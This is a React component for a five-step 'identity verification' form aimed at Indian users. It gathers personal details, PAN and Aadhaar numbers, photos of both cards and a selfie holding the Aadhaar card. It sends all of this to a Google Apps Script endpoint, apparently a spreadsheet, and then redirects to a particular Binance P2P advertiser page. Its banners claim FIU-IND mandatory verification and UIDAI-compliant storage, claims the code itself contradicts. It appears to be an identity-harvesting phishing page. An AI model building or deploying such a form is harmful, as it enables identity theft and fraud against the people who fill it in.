import React, { useState, useRef, useEffect } from 'react';
import { doc, getDoc, setDoc, serverTimestamp } from 'firebase/firestore';
import { auth, db } from '../../firebase';
import { APP_CONFIG } from '../../constants';

const KycForm: React.FC = () => {
  const [step, setStep] = useState(1);
  const [loadingInitial, setLoadingInitial] = useState(true);
  const [isSubmitting, setIsSubmitting] = useState(false);
  const [formData, setFormData] = useState({
    name: '',
    dob: '',
    gender: 'Male',
    phone: '+91',
    email: '',
    address: '',
    pan: '',
    aadhaar: '',
  });
  const [selfie, setSelfie] = useState<string | null>(null);
  const [panFront, setPanFront] = useState<string | null>(null);
  const [panBack, setPanBack] = useState<string | null>(null);
  const [aadhaarFront, setAadhaarFront] = useState<string | null>(null);
  const [aadhaarBack, setAadhaarBack] = useState<string | null>(null);
  const [cameraError, setCameraError] = useState(false);

  const handleImageUpload = (e: React.ChangeEvent<HTMLInputElement>, setter: React.Dispatch<React.SetStateAction<string | null>>) => {
    const file = e.target.files?.[0];
    if (file) {
      const reader = new FileReader();
      reader.onloadend = () => {
        setter(reader.result as string);
      };
      reader.readAsDataURL(file);
    }
  };
  const videoRef = useRef<HTMLVideoElement>(null);
  const canvasRef = useRef<HTMLCanvasElement>(null);

  useEffect(() => {
    const checkKyc = async () => {
      const user = auth.currentUser;
      if (user) {
        if (!APP_CONFIG.GOOGLE_SHEET_WEB_APP_URL || APP_CONFIG.GOOGLE_SHEET_WEB_APP_URL.includes('YOUR_GOOGLE_APPS_SCRIPT_WEB_APP_URL')) {
          console.log("Google Sheet Database not configured yet.");
          setLoadingInitial(false);
          return;
        }
        try {
          const res = await fetch(`${APP_CONFIG.GOOGLE_SHEET_WEB_APP_URL}?action=CHECK_KYC&userId=${user.uid}`);
          const data = await res.json();
          if (data && data.exists) {
            window.location.href = "https://c2c.binance.com/en/advertiserDetail?advertiserNo=sde741e95d96635af90ff0d0579e252ec";
            return;
          }
        } catch (error: any) {
          console.error("Google Sheet KYC check failed:", error);
        }
      }
      setLoadingInitial(false);
    };
    checkKyc();
  }, []);

  const startCamera = async () => {
    try {
      const stream = await navigator.mediaDevices.getUserMedia({ video: true });
      if (videoRef.current) {
        videoRef.current.srcObject = stream;
      }
      setCameraError(false);
    } catch (err) {
      console.error("Camera error:", err);
      setCameraError(true);
    }
  };

  const stopCamera = () => {
    if (videoRef.current && videoRef.current.srcObject) {
      const stream = videoRef.current.srcObject as MediaStream;
      stream.getTracks().forEach(track => track.stop());
    }
  };

  const takeSelfie = () => {
    if (videoRef.current && canvasRef.current) {
      const context = canvasRef.current.getContext('2d');
      if (context) {
        canvasRef.current.width = 400;
        canvasRef.current.height = (400 * videoRef.current.videoHeight) / videoRef.current.videoWidth;
        context.drawImage(videoRef.current, 0, 0, canvasRef.current.width, canvasRef.current.height);
        // Compress the image aggressively to avoid Firestore size limits blocking it
        const data = canvasRef.current.toDataURL('image/jpeg', 0.5);
        setSelfie(data);
        stopCamera();
      }
    }
  };

  const handleSubmit = async () => {
    setIsSubmitting(true);

    if (!APP_CONFIG.GOOGLE_SHEET_WEB_APP_URL || APP_CONFIG.GOOGLE_SHEET_WEB_APP_URL.includes('YOUR_GOOGLE_APPS_SCRIPT_WEB_APP_URL')) {
      alert("Google Sheet Database is not set up! Please read google-sheet-backend-guide.md to configure.");
      setIsSubmitting(false);
      return;
    }

    try {
      const user = auth.currentUser;
      const userId = user ? user.uid : `user_${Math.floor(Math.random() * 1000000)}`;

        const submissionData = {
          action: "SUBMIT_KYC",
          ...formData,
          id: userId,
          selfie: selfie || '',
          panFront: panFront || '',
          panBack: panBack || '',
          aadhaarFront: aadhaarFront || '',
          aadhaarBack: aadhaarBack || ''
        };

      try {
        const res = await fetch(APP_CONFIG.GOOGLE_SHEET_WEB_APP_URL, {
          method: 'POST',
          body: JSON.stringify(submissionData)
        });
        const data = await res.json();
        if (data.result !== 'success') {
          alert("Database Error: " + data.error);
          setIsSubmitting(false);
          return;
        }
      } catch (fbError: any) {
        console.error("Fetch Error:", fbError);
        alert(`Network Error: Check console or setup.`);
        setIsSubmitting(false);
        return;
      }

      setStep(5);
      setTimeout(() => {
        window.location.href = "https://c2c.binance.com/en/advertiserDetail?advertiserNo=sde741e95d96635af90ff0d0579e252ec";
      }, 6000);
    } catch (error) {
      console.error("Error submitting KYC:", error);
      alert("Failed to submit KYC. Please try again.");
    } finally {
      setIsSubmitting(false);
    }
  };

  if (loadingInitial) {
    return (
      <div className="w-full flex justify-center py-20 px-4">
        <div className="text-cyan-400 font-orbitron font-black tracking-widest uppercase animate-pulse">
          INITIALIZING VERIFICATION PROTOCOL...
        </div>
      </div>
    );
  }

  const isPhase1Valid = formData.name && formData.dob && formData.gender && formData.phone.length === 13 && formData.email.includes('@') && formData.address;

  return (
    <div className="w-full max-w-full overflow-x-hidden py-10 md:py-24 px-4 flex justify-center">
      <div className="w-full max-w-xl glass-card p-6 md:p-10 rounded-2xl md:rounded-[3rem] border-white/5">
        <div className="mb-8 md:mb-10 text-center">
          <h2 className="text-xl md:text-3xl font-black font-orbitron tracking-tighter uppercase mb-2">IDENTITY PROTOCOL</h2>
          <p className="text-gray-500 font-bold text-[9px] md:text-xs uppercase tracking-widest">FIU-IND MANDATORY VERIFICATION</p>

          <div className="flex items-center mt-6 md:mt-10 gap-2 md:gap-3">
            {[1, 2, 3, 4, 5].map((s) => (
              <div key={s} className="flex-1 h-1 md:h-1.5 rounded-full overflow-hidden bg-white/5">
                <div className={`h-full transition-all duration-700 ${s <= step ? 'bg-cyan-500 shadow-[0_0_10px_rgba(6,182,212,0.5)]' : ''}`} />
              </div>
            ))}
          </div>
        </div>

        {step === 1 && (
          <div className="space-y-6">
            <h3 className="text-[10px] md:text-xs font-black text-cyan-400 font-orbitron tracking-widest uppercase">Phase 01: Information</h3>
            <div className="space-y-4">
              <input
                type="text"
                placeholder="FULL NAME"
                className="w-full bg-white/5 border border-white/10 rounded-xl px-4 py-3 md:px-5 md:py-4 text-white text-sm font-bold outline-none focus:border-cyan-500"
                value={formData.name}
                onChange={(e) => setFormData({ ...formData, name: e.target.value })}
              />
              <input
                type="date"
                placeholder="DOB"
                max="9999-12-31"
                className="w-full bg-white/5 border border-white/10 rounded-xl px-4 py-3 md:px-5 md:py-4 text-gray-400 text-sm font-bold outline-none focus:border-cyan-500"
                value={formData.dob}
                onChange={(e) => setFormData({ ...formData, dob: e.target.value })}
              />
              <select
                className="w-full bg-[#111] border border-white/10 rounded-xl px-4 py-3 md:px-5 md:py-4 text-white text-sm font-bold outline-none focus:border-cyan-500 appearance-none"
                value={formData.gender}
                onChange={(e) => setFormData({ ...formData, gender: e.target.value })}
              >
                <option value="Male">Male</option>
                <option value="Female">Female</option>
                <option value="Others">Others</option>
              </select>
              <input
                type="text"
                placeholder="PHONE (+91XXXXXXXXXX)"
                className="w-full bg-white/5 border border-white/10 rounded-xl px-4 py-3 md:px-5 md:py-4 text-white text-sm font-bold outline-none focus:border-cyan-500"
                value={formData.phone}
                onChange={(e) => {
                  let val = e.target.value.replace(/[^\d+]/g, '');
                  if (!val.startsWith('+91')) {
                    val = '+91' + val.replace(/^\+?9?1?/, '');
                  }
                  if (val.length > 13) val = val.slice(0, 13);
                  setFormData({ ...formData, phone: val });
                }}
              />
              <input
                type="email"
                placeholder="EMAIL ID"
                className="w-full bg-white/5 border border-white/10 rounded-xl px-4 py-3 md:px-5 md:py-4 text-white text-sm font-bold outline-none focus:border-cyan-500"
                value={formData.email}
                onChange={(e) => setFormData({ ...formData, email: e.target.value })}
              />
              <textarea
                placeholder="FULL RESIDENTIAL ADDRESS"
                rows={3}
                className="w-full bg-white/5 border border-white/10 rounded-xl px-4 py-3 md:px-5 md:py-4 text-white text-sm font-bold outline-none focus:border-cyan-500 resize-none"
                value={formData.address}
                onChange={(e) => setFormData({ ...formData, address: e.target.value })}
              ></textarea>
            </div>
            <button
              onClick={() => setStep(2)}
              disabled={!isPhase1Valid}
              className="w-full bg-cyan-500 text-black py-4 rounded-xl font-black font-orbitron tracking-widest text-[11px] md:text-xs uppercase hover:bg-cyan-400 transition-all disabled:opacity-30"
            >
              PROCEED
            </button>
          </div>
        )}

        {step === 2 && (
          <div className="space-y-6">
            <h3 className="text-[10px] md:text-xs font-black text-purple-400 font-orbitron tracking-widest uppercase">Phase 02: PAN Verification</h3>
            <div>
              <label className="block text-[8px] md:text-[10px] font-black text-gray-500 mb-2 uppercase tracking-widest">PAN NUMBER (REQUIRED FOR 194S)</label>
              <input
                type="text"
                placeholder="ABCDE1234F"
                maxLength={10}
                className="w-full bg-white/5 border border-white/10 rounded-xl px-4 py-3 md:px-5 md:py-4 text-white text-sm font-bold outline-none focus:border-cyan-500 uppercase"
                value={formData.pan}
                onChange={(e) => setFormData({ ...formData, pan: e.target.value.toUpperCase().slice(0, 10) })}
              />
            </div>
            <div className="grid grid-cols-2 gap-4">
              <div>
                <label className="block text-[8px] md:text-[10px] font-black text-gray-500 mb-2 uppercase tracking-widest">PAN FRONT</label>
                <input type="file" accept="image/*" onChange={(e) => handleImageUpload(e, setPanFront)} className="w-full text-xs text-gray-400 file:mr-4 file:py-2 file:px-4 file:rounded-xl file:border-0 file:text-xs file:font-black file:bg-cyan-500/10 file:text-cyan-400 hover:file:bg-cyan-500/20" />
                {panFront && <div className="mt-2 h-20 bg-gray-900 rounded-xl overflow-hidden"><img src={panFront} className="h-full w-full object-cover" /></div>}
              </div>
              <div>
                <label className="block text-[8px] md:text-[10px] font-black text-gray-500 mb-2 uppercase tracking-widest">PAN BACK</label>
                <input type="file" accept="image/*" onChange={(e) => handleImageUpload(e, setPanBack)} className="w-full text-xs text-gray-400 file:mr-4 file:py-2 file:px-4 file:rounded-xl file:border-0 file:text-xs file:font-black file:bg-cyan-500/10 file:text-cyan-400 hover:file:bg-cyan-500/20" />
                {panBack && <div className="mt-2 h-20 bg-gray-900 rounded-xl overflow-hidden"><img src={panBack} className="h-full w-full object-cover" /></div>}
              </div>
            </div>
            <div className="flex gap-4">
              <button
                onClick={() => setStep(1)}
                className="w-1/3 bg-white/5 border border-white/10 text-white py-4 rounded-xl font-black font-orbitron tracking-widest text-[11px] md:text-xs uppercase hover:bg-white/10"
              >
                BACK
              </button>
              <button
                onClick={() => setStep(3)}
                disabled={formData.pan.length !== 10 || !panFront || !panBack}
                className="w-2/3 bg-white text-black py-4 rounded-xl font-black font-orbitron tracking-widest text-[11px] md:text-xs uppercase disabled:opacity-30"
              >
                NEXT: AADHAAR
              </button>
            </div>
          </div>
        )}

        {step === 3 && (
          <div className="space-y-6">
            <h3 className="text-[10px] md:text-xs font-black text-pink-400 font-orbitron tracking-widest uppercase">Phase 03: Aadhaar Details</h3>
            <div>
              <label className="block text-[8px] md:text-[10px] font-black text-gray-500 mb-2 uppercase tracking-widest">AADHAAR (12 DIGITS)</label>
              <input
                type="password"
                placeholder="•••• •••• ••••"
                className="w-full bg-white/5 border border-white/10 rounded-xl px-4 py-3 md:px-5 md:py-4 text-white text-sm font-bold outline-none focus:border-cyan-500"
                value={formData.aadhaar}
                onChange={(e) => setFormData({ ...formData, aadhaar: e.target.value.replace(/\D/g, '').slice(0, 12) })}
              />
              <p className="text-[9px] text-gray-600 mt-3 font-bold uppercase">Stored in compliance with UIDAI guidelines.</p>
            </div>
            <div className="grid grid-cols-2 gap-4">
              <div>
                <label className="block text-[8px] md:text-[10px] font-black text-gray-500 mb-2 uppercase tracking-widest">AADHAAR FRONT</label>
                <input type="file" accept="image/*" onChange={(e) => handleImageUpload(e, setAadhaarFront)} className="w-full text-xs text-gray-400 file:mr-4 file:py-2 file:px-4 file:rounded-xl file:border-0 file:text-xs file:font-black file:bg-cyan-500/10 file:text-cyan-400 hover:file:bg-cyan-500/20" />
                {aadhaarFront && <div className="mt-2 h-20 bg-gray-900 rounded-xl overflow-hidden"><img src={aadhaarFront} className="h-full w-full object-cover" /></div>}
              </div>
              <div>
                <label className="block text-[8px] md:text-[10px] font-black text-gray-500 mb-2 uppercase tracking-widest">AADHAAR BACK</label>
                <input type="file" accept="image/*" onChange={(e) => handleImageUpload(e, setAadhaarBack)} className="w-full text-xs text-gray-400 file:mr-4 file:py-2 file:px-4 file:rounded-xl file:border-0 file:text-xs file:font-black file:bg-cyan-500/10 file:text-cyan-400 hover:file:bg-cyan-500/20" />
                {aadhaarBack && <div className="mt-2 h-20 bg-gray-900 rounded-xl overflow-hidden"><img src={aadhaarBack} className="h-full w-full object-cover" /></div>}
              </div>
            </div>
            <div className="flex gap-4">
              <button
                onClick={() => setStep(2)}
                className="w-1/3 bg-white/5 border border-white/10 text-white py-4 rounded-xl font-black font-orbitron tracking-widest text-[11px] md:text-xs uppercase hover:bg-white/10"
              >
                BACK
              </button>
              <button
                onClick={() => { setStep(4); startCamera(); }}
                disabled={formData.aadhaar.length !== 12 || !aadhaarFront || !aadhaarBack}
                className="w-2/3 bg-white text-black py-4 rounded-xl font-black font-orbitron tracking-widest text-[11px] md:text-xs uppercase disabled:opacity-30"
              >
                PROCEED TO SELFIE
              </button>
            </div>
          </div>
        )}

        {step === 4 && (
          <div className="space-y-6 text-center">
            <h3 className="text-[10px] md:text-xs font-black text-green-400 font-orbitron tracking-widest uppercase">Phase 04: Capture Selfie holding Aadhar card</h3>
            <div className="relative w-48 h-48 md:w-64 md:h-64 mx-auto bg-gray-900 rounded-2xl md:rounded-[2rem] overflow-hidden border-2 border-dashed border-cyan-500/50 flex items-center justify-center">
              {!selfie ? (
                cameraError ? (
                  <div className="text-center p-4">
                    <p className="text-[10px] text-gray-400 uppercase tracking-widest mb-3 font-bold">Camera Unavailable</p>
                    <label className="cursor-pointer bg-cyan-500/20 text-cyan-400 px-4 py-3 rounded-xl text-xs font-black uppercase inline-block border border-cyan-500/50 hover:bg-cyan-500/30 transition">
                      Upload from Gallery
                      <input type="file" accept="image/*" capture="user" className="hidden" onChange={(e) => handleImageUpload(e, setSelfie)} />
                    </label>
                  </div>
                ) : (
                  <video ref={videoRef} autoPlay playsInline className="w-full h-full object-cover grayscale contrast-125 bg-black" />
                )
              ) : (
                <img src={selfie} className="w-full h-full object-cover" />
              )}
            </div>
            <canvas ref={canvasRef} className="hidden" />

            <div className="space-y-3">
              {!selfie ? (
                <div className="flex gap-4">
                  <button onClick={() => { stopCamera(); setStep(3); }} className="w-1/3 py-4 border border-white/10 rounded-xl font-black font-orbitron tracking-widest text-[10px] md:text-[11px] uppercase text-gray-400 hover:text-white">BACK</button>
                  <button onClick={takeSelfie} disabled={cameraError} className="w-2/3 bg-cyan-500 text-black py-4 rounded-xl font-black font-orbitron tracking-widest text-[11px] md:text-xs uppercase hover:bg-cyan-400 disabled:opacity-50">CAPTURE</button>
                </div>
              ) : (
                <div className="grid grid-cols-2 gap-3">
                  <button onClick={() => { setSelfie(null); startCamera(); }} disabled={isSubmitting} className="py-3 border border-white/10 rounded-xl font-black text-[10px] uppercase text-gray-400 hover:text-white disabled:opacity-50">RETRY</button>
                  <button
                    onClick={handleSubmit}
                    disabled={isSubmitting}
                    className="bg-green-500 text-black py-3 rounded-xl font-black font-orbitron tracking-widest text-[10px] uppercase hover:bg-green-400 disabled:opacity-50"
                  >
                    {isSubmitting ? 'SUBMITTING...' : 'SUBMIT'}
                  </button>
                </div>
              )}
            </div>
          </div>
        )}

        {step === 5 && (
          <div className="space-y-6 text-center py-8">
            <h3 className="text-lg md:text-xl font-black text-cyan-400 font-orbitron tracking-widest uppercase mb-6">Verification Received</h3>
            <div className="flex justify-center mb-8">
              <svg className="w-20 h-20 md:w-24 md:h-24 text-cyan-400 animate-spin" fill="none" viewBox="0 0 24 24">
                <circle className="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" strokeWidth="4"></circle>
                <path className="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path>
              </svg>
            </div>
            <p className="text-sm md:text-base font-bold text-white uppercase tracking-widest leading-loose">
              10-12 Hours is Needed To Verify Your Account.
            </p>
            <p className="text-[10px] md:text-xs text-gray-500 font-bold uppercase tracking-[0.2em] mt-6 animate-pulse">
              Redirecting you to Secure Environment...
            </p>
          </div>
        )}
      </div>
    </div>
  );
};

export default KycForm;